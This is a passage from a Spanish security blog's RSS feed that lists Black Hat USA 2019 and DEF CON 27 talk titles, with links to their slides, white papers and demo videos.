&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Berta-Backdooring-Hardware-Devices-By-Injecting-Malicious-Payloads-On-Microcontrollers-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Securing the System: A Deep Dive into Reversing Android Pre-Installed Apps

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Stone-Securing-The-System-A-Deep-Dive-Into-Reversing-Android-Preinstalled-Apps.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Preventing Authentication Bypass: A Tale of Two Researchers

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Jaiswal-Preventing-Authentication-Bypass-A-Tale-Of-Two-Researchers.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Automation Techniques in C++ Reverse Engineering&lt;/li&gt;
&lt;li&gt;Inside the Apple T2

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Davidov-Inside-The-Apple-T2.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Making Big Things Better the Dead Cow Way

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Menn-Making-Big-Things-Better-The-Dead-Cow-Way-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Critical Zero Days Remotely Compromise the Most Popular Real-Time OS

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Seri-Critical-Zero-Days-Remotely-Compromise-The-Most-Popular-Real-Time-OS.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Seri-Critical-Zero-Days-Remotely-Compromise-The-Most-Popular-Real-Time-OS-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Fantastic Red-Team Attacks and How to Find Them

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Smith-Fantastic-Red-Team-Attacks-And-How-To-Find-Them.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The Discovery of a Government Malware and an Unexpected Spy Scandal

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Franceschi-Bicchierai-The-Discovery-Of-A-Government-Malware-And-An-Unexpected-Spy-Scandal.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Attacking iPhone XS Max

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Wang-Attacking-IPhone-XS-Max.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Securing Apps in the Open-By-Default Cloud

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Howes-Securing-Apps-In-The-Open-By-Default-Cloud.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Adventures in the Underland: The CQForensic Toolkit as a Unique Weapon Against Hackers&lt;/li&gt;
&lt;li&gt;HostSplit: Exploitable Antipatterns in Unicode Normalization

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Birch-HostSplit-Exploitable-Antipatterns-In-Unicode-Normalization-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Hacking Ten Million Useful Idiots: Online Propaganda as a Socio-Technical Security Project

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Perlman-Hacking-Ten-Million-Useful-Idiots-Online-Propaganda-As-A-Socio-Technical-Security-Project.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Everybody be Cool, This is a Robbery!

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Campana-Everybody-Be-Cool-This-Is-A-Robbery.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;A Compendium of Container Escapes

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Edwards-Compendium-Of-Container-Escapes.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;The Future of ATO

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Martin-The-Future-Of-ATO.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Exploring the New World : Remote Exploitation of SQLite and Curl

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Qian-Exploring-The-New-World-Remote-Exploitation-Of-SQLite-And-Curl.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Qian-Exploring-The-New-World-Remote-Exploitation-Of-SQLite-And-Curl-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;How to Detect that Your Domains are Being Abused for Phishing by Using DNS

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Hoelzel-How-To-Detect-That-Your-Domains-Are-Being-Abused-For-Phishing-By-Using-DNS.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Debug for Bug: Crack and Hack Apple Core by Itself - Fun and Profit to Debug and Fuzz Apple Kernel by lldb Script

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Lilang-Debug-For-Bug-Crack-And-Hack-Apple-Core-By-Itself-Fun-And-Profit-To-Debug-And-Fuzz-Apple-Kernel-By-LLDB-Script.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Shifting Knowledge Left: Keeping up with Modern Application Security

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Stanislav-Shifting-Knowledge-Left-Keeping-Up-With-Modern-Application-Security.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Paging All Windows Geeks – Finding Evil in Windows 10 Compressed Memory

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Sardar-Paging-All-Windows-Geeks-Finding-Evil-In-Windows-10-Compressed-Memory.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Sardar-Paging-All-Windows-Geeks-Finding-Evil-In-Windows-10-Compressed-Memory-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Breaking Samsung’s ARM TrustZone

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Peterlin-Breaking-Samsungs-ARM-TrustZone.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Command Injection in F5 iRules

&lt;ul&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Jerkeby-Command-Injection-In-Irules-Loadbalancer-Scripts.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://i.blackhat.com/USA-19/Thursday/us-19-Jerkeby-Command-Injection-In-Irules-Loadbalancer-Scripts-wp.pdf"&gt;Download White Paper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Moving from Hacking IoT Gadgets to Breaking into One of Europe's Highest Hotel Suites

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://i.blackhat.com/USA-19/Thursday/us-19-Ray-Moving-From-Hacking-IoT-Gadgets-To-Breaking-Into-One-Of-Europes-Highest-Hotel-Suites.pdf"&gt;Download Presentation Slides&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Lessons and Lulz: The 5th Annual Black Hat USA NOC Report&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;b&gt;&amp;nbsp;Fuente: &lt;/b&gt;&lt;a href="https://www.cyberhades.com/2019/08/18/material-black-hat-usa-2019/" target="_blank"&gt;https://www.cyberhades.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizZdFd5lF4vbOYOzd-1F3ysv6fCsdgzbjy-aOkaPVl4MOVIJa0i2L3HzazLKRaLyoJ342CNhr1QBuFBlQ0Tl8cYxZgTqHOCPdrXFtqLncpZttMMH1uaWBvCe49MPweTmvVOSjzaGqQ8Y4B/s72-c/blackhat_2019.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Presentaciones y Demos de la DEF CON 27 (2019)</title><link>http://www.blackploit.com/2019/08/presentaciones-y-demos-de-la-def-con-27.html</link><category>Black Hat</category><category>Conference</category><category>DEFCON</category><category>Paper</category><category>Presentaciones</category><category>Seguridad</category><category>Seguridad Web</category><category>Textos</category><author>noreply@blogger.com (Leo Romero)</author><pubDate>Tue, 27 Aug 2019 19:11:00 -0400</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8845092171963399971.post-7384498514578327959</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2V0AKcDKDATagDbqvca8gVMVQXpxayT0F0SUZx27I3duKZzU8mjVpP3kAIpBVC9TIWsSnsHnfU7GSAVx3NTrJu368QX_qZ0Jd7AwUPVUgfX-C0GEDsVyYCy5AQBSLC1gzU4MnV2YhdRAH/s1600/defcon27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="319" data-original-width="600" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2V0AKcDKDATagDbqvca8gVMVQXpxayT0F0SUZx27I3duKZzU8mjVpP3kAIpBVC9TIWsSnsHnfU7GSAVx3NTrJu368QX_qZ0Jd7AwUPVUgfX-C0GEDsVyYCy5AQBSLC1gzU4MnV2YhdRAH/s640/defcon27.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Se llevó a cabo del 8 al 11 de agosto del 2019 la &lt;b&gt;DEF CON 27&lt;/b&gt;,
 conferencia que se destaca por llevar a los mejores exponentes 
mundiales y por ser una de las conferencias más renombradas en el mundo 
de la seguridad informática, hacking y pentest. Las presentaciones y 
demos las puedes descargar todas juntas en &lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations.rar" rel="nofollow" target="_blank"&gt;formato RAR&lt;/a&gt; o individualmente:&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Anish-Athalye-Strong-Isolation.pdf"&gt;Anish-Athalye-Strong-Isolation.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Anish-Athalye-Demo-Video/Anish%20Athalye%20-%20Strong%20Isolation%20-%20Demo%201%20of%207.mp4"&gt;Anish Athalye - Strong Isolation - Demo 1 of 7.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Anish-Athalye-Demo-Video/Anish%20Athalye%20-%20Strong%20Isolation%20-%20Demo%202%20of%207.mp4"&gt;Anish Athalye - Strong Isolation - Demo 2 of 7.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Anish-Athalye-Demo-Video/Anish%20Athalye%20-%20Strong%20Isolation%20-%20Demo%203%20of%207.mp4"&gt;Anish Athalye - Strong Isolation - Demo 3 of 7.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Anish-Athalye-Demo-Video/Anish%20Athalye%20-%20Strong%20Isolation%20-%20Demo%204%20of%207.mp4"&gt;Anish Athalye - Strong Isolation - Demo 4 of 7.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Anish-Athalye-Demo-Video/Anish%20Athalye%20-%20Strong%20Isolation%20-%20Demo%205%20of%207.mp4"&gt;Anish Athalye - Strong Isolation - Demo 5 of 7.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Anish-Athalye-Demo-Video/Anish%20Athalye%20-%20Strong%20Isolation%20-%20Demo%206%20of%207.mp4"&gt;Anish Athalye - Strong Isolation - Demo 6 of 7.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Anish-Athalye-Demo-Video/Anish%20Athalye%20-%20Strong%20Isolation%20-%20Demo%207%20of%207.mp4"&gt;Anish Athalye - Strong Isolation - Demo 7 of 7.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Bernhard-Mueller-The-Ether-Wars.pdf"&gt;Bernhard-Mueller-The-Ether-Wars.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Bernhard-Mueller-Demo-Videos/DEFCON-27-Bernhard-Mueller-demo_01_destructible.mp4"&gt;Bernhard-Mueller-demo_01_destructible.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Bernhard-Mueller-Demo-Videos/DEFCON-27-Bernhard-Mueller-demo_02_ethernaut.mp4"&gt;Bernhard-Mueller-demo_02_ethernaut.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Bernhard-Mueller-Demo-Videos/DEFCON-27-Bernhard-Mueller-demo_03_graph.mp4"&gt;Bernhard-Mueller-demo_03_graph.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Bernhard-Mueller-Demo-Videos/DEFCON-27-Bernhard-Mueller-demo_04_scrooge.mp4"&gt;Bernhard-Mueller-demo_04_scrooge.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Bill-Graydon-Restricted-Keys.pdf"&gt;Bill-Graydon-Restricted-Keys.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Bill-Graydon-Demo-Videos/Graydon%20-%20Restricted%20Keys%20-%20HPC%20keyway%20adapter.mp4"&gt;Graydon - Restricted Keys - HPC keyway adapter.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Bill-Graydon-Demo-Videos/Graydon%20-%20Restricted%20Keys%20-%20SC1%20cut.mp4"&gt;Graydon - Restricted Keys - SC1 cut.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Bill-Graydon-Demo-Videos/Graydon%20-%20Restricted%20Keys%20-%20m3%20slider%20cut.mp4"&gt;Graydon - Restricted Keys - m3 slider cut.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Bill-Graydon-Demo-Videos/Graydon%20-%20Restricted%20Keys%20-%20mul-t-lock%20drill%20press.mp4"&gt;Graydon - Restricted Keys - mul-t-lock drill press.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Bill-Graydon-Demo-Videos/Graydon%20-%20Restricted%20Keys%20-%20standard%20profile%20cut.mp4"&gt;Graydon - Restricted Keys - standard profile cut.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Christopher-Wade-Tag-side-attacks-against-NFC.pdf"&gt;Christopher-Wade-Tag-side-attacks-against-NFC.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Christopher-Wade-Tag-side-attacks-against-NFC-Demo-Videos/Christopher%20Wade%20-%20Demo%201.mp4"&gt;Christopher Wade - Demo 1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Christopher-Wade-Tag-side-attacks-against-NFC-Demo-Videos/Christopher%20Wade%20-%20Demo%202.mp4"&gt;Christopher Wade - Demo 2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Christopher-Wade-Tag-side-attacks-against-NFC-Demo-Videos/Christopher%20Wade%20-%20Demo%203.mp4"&gt;Christopher Wade - Demo 3.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Christopher-Wade-Tag-side-attacks-against-NFC-Demo-Videos/Christopher%20Wade%20-%20Demo%204.mp4"&gt;Christopher Wade - Demo 4.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Damien-Cauquil-Defeating-Bluetooth-Low-Energy-5-PRNG-for-fun-and-jamming.PDF"&gt;Damien-Cauquil-Defeating-Bluetooth-Low-Energy-5-PRNG-for-fun-and-jamming.PDF&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Damien-Cauquil-Defeating-Bluetooth-Low-Energy-5-PRNG-for-fun-and-jamming-Demo-Video/Damien%20Cauquil%20-%201.simulating_csa2_attack.mp4"&gt;Damien Cauquil - 1.simulating_csa2_attack.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Damien-Cauquil-Defeating-Bluetooth-Low-Energy-5-PRNG-for-fun-and-jamming-Demo-Video/Damien%20Cauquil%20-%201.simulating_csa2_attack_1.mp4"&gt;Damien Cauquil - 1.simulating_csa2_attack_1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Damien-Cauquil-Defeating-Bluetooth-Low-Energy-5-PRNG-for-fun-and-jamming-Demo-Video/Damien%20Cauquil%20-%202.sniffing_csa2.mp4"&gt;Damien Cauquil - 2.sniffing_csa2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Damien-Cauquil-Defeating-Bluetooth-Low-Energy-5-PRNG-for-fun-and-jamming-Demo-Video/Damien%20Cauquil%20-%202.sniffing_csa2_1.mp4"&gt;Damien Cauquil - 2.sniffing_csa2_1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Damien-Cauquil-Defeating-Bluetooth-Low-Energy-5-PRNG-for-fun-and-jamming-Demo-Video/Damien%20Cauquil%20-%203.jamming_csa2.mp4"&gt;Damien Cauquil - 3.jamming_csa2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Damien-Cauquil-Defeating-Bluetooth-Low-Energy-5-PRNG-for-fun-and-jamming-Demo-Video/Damien%20Cauquil%20-%203.jamming_csa2_1.mp4"&gt;Damien Cauquil - 3.jamming_csa2_1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-DimitrySnezhkov-Zombie-Ant-Farm-Practical-Tips.pdf"&gt;DimitrySnezhkov-Zombie-Ant-Farm-Practical-Tips.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Dimitry-Snezhkov-Demo-Video/DEFCON-27-DimitrySnezhkov-Zombie-Ant-Farm-Practical-Tips-1080.mp4"&gt;DimitrySnezhkov-Zombie-Ant-Farm-Practical-Tips-1080.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Dimitry-Snezhkov-Demo-Video/DEFCON-27-DimitrySnezhkov-Zombie-Ant-Farm-Practical-Tips-Demo.mp4"&gt;DimitrySnezhkov-Zombie-Ant-Farm-Practical-Tips-Demo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Dirk-jan-Mollema-Im-in-your-cloud-pwning-your-azure-environment.pdf"&gt;Dirk-jan-Mollema-Im-in-your-cloud-pwning-your-azure-environment.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Dirk-jan-Mollema-Demo-Videos/Dirk-jan%20Mollema%20-%20Im%20in%20your%20cloud%20pwning%20your%20azure%20environment%20-%20demo1.mp4"&gt;Dirk-jan Mollema - Im in your cloud pwning your azure environment - demo1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Dirk-jan-Mollema-Demo-Videos/Dirk-jan%20Mollema%20-%20Im%20in%20your%20cloud%20pwning%20your%20azure%20environment%20-%20mfademo.mp4"&gt;Dirk-jan Mollema - Im in your cloud pwning your azure environment - mfademo.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Dirk-jan-Mollema-Demo-Videos/Dirk-jan%20Mollema%20-%20Im%20in%20your%20cloud%20pwning%20your%20azure%20environment%20-%20notepad.mp4"&gt;Dirk-jan Mollema - Im in your cloud pwning your azure environment - notepad.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Douglas-McKee-HVACking-Understanding-the-Delta-Between-Security-and-Reality.pdf"&gt;Douglas-McKee-HVACking-Understanding-the-Delta-Between-Security-and-Reality.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Douglas-McKee-Demo-Video/Douglas%20McKee%20-%20HVACKing%20Demo%202.mp4"&gt;Douglas McKee - HVACKing Demo 2.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Douglas-McKee-Demo-Video/Douglas%20McKee%20-%20HVACKing%20Demo%203.mp4"&gt;Douglas McKee - HVACKing Demo 3.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Douglas-McKee-Demo-Video/Douglas%20McKee%20HVACKing%20Demo%201.mp4"&gt;Douglas McKee HVACKing Demo 1.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Gerald-Doussot-Roger-Meyer-State-of-DNS-Rebinding-Attack-and-Prevention-Techniques-and-the-Singularity-of-Origin.pdf"&gt;Gerald-Doussot-Roger-Meyer-State-of-DNS-Rebinding-Attack-and-Prevention-Techniques-and-the-Singularity-of-Origin.pdf&lt;/a&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Gerald-Doussot-Roger-Meyer-State-of-DNS-Rebinding-Attack-and-Prevention-Demo-Video/DEFCON-27-Gerald-Doussot-Roger-Meyer-State-of-DNS-Rebinding-Attack-and-Prevention-Techniques-and-the-Singularity-of-Origin-rebind-demo1-iPad-5sec.mp4"&gt;Gerald-Doussot-Roger-Meyer-State-of-DNS-Rebinding-Attack-and-Prevention-Techniques-and-the-Singularity-of-Origin-rebind-demo1-iPad-5sec.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Gerald-Doussot-Roger-Meyer-State-of-DNS-Rebinding-Attack-and-Prevention-Demo-Video/DEFCON-27-Gerald-Doussot-Roger-Meyer-State-of-DNS-Rebinding-Attack-and-Prevention-Techniques-and-the-Singularity-of-Origin-rebind-demo2-hook-control.mp4"&gt;Gerald-Doussot-Roger-Meyer-State-of-DNS-Rebinding-Attack-and-Prevention-Techniques-and-the-Singularity-of-Origin-rebind-demo2-hook-control.mp4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20presentations/DEFCON-27-Gerald-Doussot-Roger-Meyer-State-of-DNS-Rebinding-Attack-and-Prevention-Demo-Video/DEFCON-27-Gerald-Doussot-Roger-Meyer-State-of-DNS-Rebinding-Attack-and-Prevention-Techniques-and-the-Singularity-of-Origin-rebind-demo3-automation.mp4"&gt;Gerald-Doussot-Roger-Meyer-State-of-DNS-Rebinding-Attack-and-Prevention-Techniques-and-the-Singularity-of-Origin-rebind-demo3-automation.mp4&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
